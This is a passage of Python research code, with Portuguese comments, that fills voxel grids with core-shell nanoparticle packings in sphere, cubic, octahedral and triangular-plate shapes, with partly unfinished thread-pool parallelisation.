xx11=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy11= ((2.0+sqrt(3.0))*float(radiusc/dl)-j+1)
zz11=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
xx12=((2.0+sqrt(3.0))*float(radiusc/dl)-i+1)
yy12= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz12=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
xx13=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy13= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz13=((2.0+sqrt(3.0))*float(radiusc/dl)-k+1)
xx14=(1*float(radiusc/dl)-i+1)
yy14= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz14=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
ii=ii+1
return A
###########################################################################################################################
def para_rec(j,k,xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
# print(radiuscore, radiusc, "dimensions")
# print(j,"j")
iii=0
jjj=0
ind=0
listind=[]
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range(zini,Ntam+1):
for g in range(zini,Npiy+1):
# w_queue= Queue()
# w_queue= Queue()
for w in range(zini,Npix+1):
# print a,b
# xx1=(basalradius/dl-i+1)
# yy1= (basalradius/dl-j+1)
# zz1=(perpradius/dl-k+1)
x[ii]= float(((float(radiusc*(2*(w-1)+1))/float(dl)-float(i)+2.0)))
y[ii]= float(((float(radiusc*(2*(g-1)+1))/float(dl)-float(j))+2.0))
z[ii]= float(((float(radiusc*(2*(h-1)+1))/float(dl)-float(k)+2.0)))
# print(x[ii],ii,len(x))
# print(i,j,k, "i,j,k")
# print(w,g,h,"w,g,h")
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
# A[i][j+(k-1)*Dy1] = index
iii=i
jjj=j+(k-1)*Dy1
# if(index==2):
# print("indice igual a 1")
ind=index
listind.append([iii,jjj,ind])
# print(ind, "eh o indice")
# print(index)
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
ii=ii+1
# return A
# if(ind==1):
# print(ind)
# print(listind)
# return iii,jjj,ind
return listind
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
def rectangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
############################################################################################################################
## TRYING TO PARALLELIZE THIS PART!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
############################################################################################################################
# nThreads = 4
# pool = ThreadPool(processes=nThreads)
num_cores = multiprocessing.cpu_count()
# print(num_cores, "cores")
# w=0
# g=0
# print(corenumber,'aqui')
# print(1)
for k in range(zini,zfin+1):
# print(zini, zfin+1, "zs")
# for j in range(yini,yfin+1):
# inputs = range(yini,yfin+1)
# parts= partial(para_rec,k=k,xini=xini,xfin=xfin,yini=yini,yfin=yfin,zini=zini,zfin=zfin,Npix=Npix,Npiy=Npiy,Ntam=Ntam,Dx1=Dx1,Dy1=Dy1,Dz1=Dz1,radiusc=radiusc,radiuscore=radiuscore,radiusshell=radiusshell,A=A,corenumber=corenumber,shellnumber=shellnumber,cnum=cnum,dl=dl,x=x,y=y,z=z,shape=shape,base=base,width=width,height=height,base2=base2,width2=width2,radiusx1=radiusx1,radiusy1=radiusy1,radiusz1=radiusz1,radiusx2=radiusx2,radiusy2=radiusy2,radiusz2=radiusz2,radiusxcs=radiusxcs,radiusycs=radiusycs,radiuszcs=radiuszcs,cs=cs)
nThreads = 2*num_cores
pool = ThreadPool(processes=nThreads)
threadsrange=int((yfin+1)/nThreads)
# print(threadsrange)
proc = []
for kkk in range(nThreads):
for j in range(kkk*threadsrange,(kkk+1)*threadsrange):
# print(j,"eh o j")
proc.append(pool.apply_async(para_rec, (j,k,xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)))
# print(len(proc), "length of proc")
for j in range(len(proc)):
proc[j].wait()
out = []
for j in range(len(proc)):
out.append(proc[j].get())
# print(len(out))
# print()
# print(len(out), "comp1",len(out[0]), "comp2")
# w=out[0]
# print(w[0])
# print(len(out),"length of out")
# print(len(w),"length of w")
for j in range(len(out)):
ww=out[j]
# print(w)
if(ww!=[]):
# print(w)
for o in range(len(ww)):
vv=ww[o]
for dd in range(len(vv)):
A[vv[0]][vv[1]]=vv[2]
# xxxx=1
# print(len(w))
# print(len(out))
# print (w[2])
# for o in range(len(w)):
# if(w[2]!=0):
# A[w[0]][w[1]]=w[2]
# if (w[2]==1):
# print("w[2] igual a 1",w[0],w[1])
# A = Parallel(n_jobs=num_cores)(delayed(parts)(j) for j in inputs)
# para_rec (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
# print(A[21][14],"esse")
return A
###########################################################################################################################
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
def columnpiling (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range(zini,Ntam+1):
# print a,b
# xx1=(basalradius/dl-i+1)
# yy1= (basalradius/dl-j+1)
# zz1=(perpradius/dl-k+1)
x[ii]= float(((float(radiusc)/float(dl)-float(i)+2.0)))
y[ii]= float(((float(radiusc)/float(dl)-float(j))+2.0))
z[ii]= float(((float(radiusc*(2*(h-1)+1))/float(dl)-float(k)+2.0)))
# print(x[ii],ii,len(x))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
ii=ii+1
return A
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
def parallelpygen(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,xini,xfin,yini,yfin,zini,zfin,Dx1,Dy1,Dz1):
mult=(Dy1)*(d_k)
aux= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
#print (Dx1)
# A= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
# print a,b
ii=1
for h in range(zini,Ntam+1):
Npiyw=Npiy-(h-1)
w=Npiyw
# print h
while (w > 0):
Npixg=Npix-(h-1)
g=Npixg
while(g>0):
x[ii]= float((((float(2.0*(g-1)+1+(h-1)))*float(radiusc)/float(dl)-float(i)+2.0)))
y[ii]= float((((float(2.0*(w-1)+1+(h-1)))*float(radiusc)/float(dl)-float(j))+2.0))
z[ii]= float((((float(sqrt(3.0)*(h-1)+1))*float(radiusc)/float(dl)-float(k)+2.0)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='interpene'):
[index,aa] = incoreshell_interpenesphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
# while (g>0):
# incoreshell(Npiy,Npix,w,g,i,j,k,ii,radiusc,radiuscore,radiusshell,A,a,b,corenumber,shellnumber,cnum)
# !!!
# div=float(radiusc/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# !!!
# if(index != 0):
# print(index)
g=g-1
# print ii,A[a][b]
ii=ii+1
# print g
w=w-1
#
return aux
def pygeneral (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
proc=[]
n_threads=2
i_thread=range(n_threads)
pool = ThreadPool(processes=n_threads)
print(corenumber,'aqui')
# print(1)
d_k=(zfin-zini)/n_threads
for i_th in i_thread:
for k in range(zini+i_th*d_k,zini+(+1+i_th)*d_k):
proc.append(pool.apply_async(parallelpygen,(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,xini,xfin,yini,yfin,zini,zfin,Dx1,Dy1,Dz1)))
for i in range(nThreads):
proc.wait()
matrix_out = []
for i in range(nThreads):
matrix_out.append(proc[i].get())
for i_th in i_thread:
for ll in range(zini+i_th*d_k,zini+(+1+i_th)*d_k):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
# there must be a formula for k!!!!
k= (zini+(+1+i_th)*d_k)*i_th
A[i][j+(k-1)*Dy1]=proc[i][j+(ll-1)*Dy1]
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
# descreve uma piramide com base hexagonal arbitrária
def hexpyramid (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
# print(corenumber,'aqui')
for v in range(1,5):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range (1, Ntam+1):
Npiyw=Npiy
# w=Npiyw/2
Npixg=Npix
# g=Npixg/2
box=0
if (h>1):
# if( h> 1):
Npiyw=(Npiy-(h-1))*2-1
if(Npiyw<=0):
Npiyw=Npiy+2
for w in range (1,int(Npiyw/2+1)):
box=box+1
Npixg=Npixg-1
if( h> 1):
Npixg=2*(Npix-(h-1))
if(Npixg<=0):
Npixg=Npix+2
for g in range(1,int(Npixg/2+1)):
if (v==1):
div=float(radiusc/dl)
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==2):
div=float(radiusc/dl)
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==3 ):
div=float(radiusc/dl)
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiyw))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==4 ):
div=float(radiusc/dl)
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiyw))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
index = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
def hexmono (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
# print(corenumber,'aqui')
for v in range(1,5):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range (1, Ntam+1):
Npiyw=Npiy
# w=Npiyw/2
Npixg=Npix
# g=Npixg/2
box=0
# print (Npiy)
# print (int(Npix/2)+1)
for w in range (1,int(Npiy/2)+1):
box=box+1
Npixg=Npixg-1
for g in range(1,int(Npix/2+1)):
if (v==1):
div=float(radiusc/dl)
# x(ii)= ((((1+(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((+1+(g-1)+2*(w-1))*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==2):
div=float(radiusc/dl)
# x(ii)= ((((1-(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((+1+(g-1)+2*(w-1))*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==3 ):
div=float(radiusc/dl)
# x(ii)= ((((1+(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((-1+1-(g-1)+2*(w-1)+Npiy)*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==4 ):
div=float(radiusc/dl)
# x(ii)= ((((1-(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((-1+1-(g-1)+2*(w-1)+Npiy)*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
index = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
# g=g-1
ii=ii+1
# w=w-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
# aqui é a geometria com base triangular
def triangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range(1, Ntam+1):
Npiyw=Npiy-(h-1)
w=Npiyw
Npixg=Npix-(h-1)
g=Npixg
box=0
Npixgg=Npixg
while (w > 0):
box=box+1
g=Npixgg
while (g>0):
div=float(radiusc/dl)
# xa(jj)= (((2*(0)+1+(Npix-1))*radiusc/dl-i+2))
# ya(jj)= (((2*(s-1)+1+(r-1))*radiusc/dl-j+2))
# za(jj)= (((Sqrt(3.0)*(r-1)+1)*radiusc/dl-k+2))
x[ii]= float(((float((2*(g-1)+(box)+(h-1)))*div-i+2)))
y[ii]= float(((float((2*(2-2)+1+(w-1)*sqrt(3.0)+(h-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
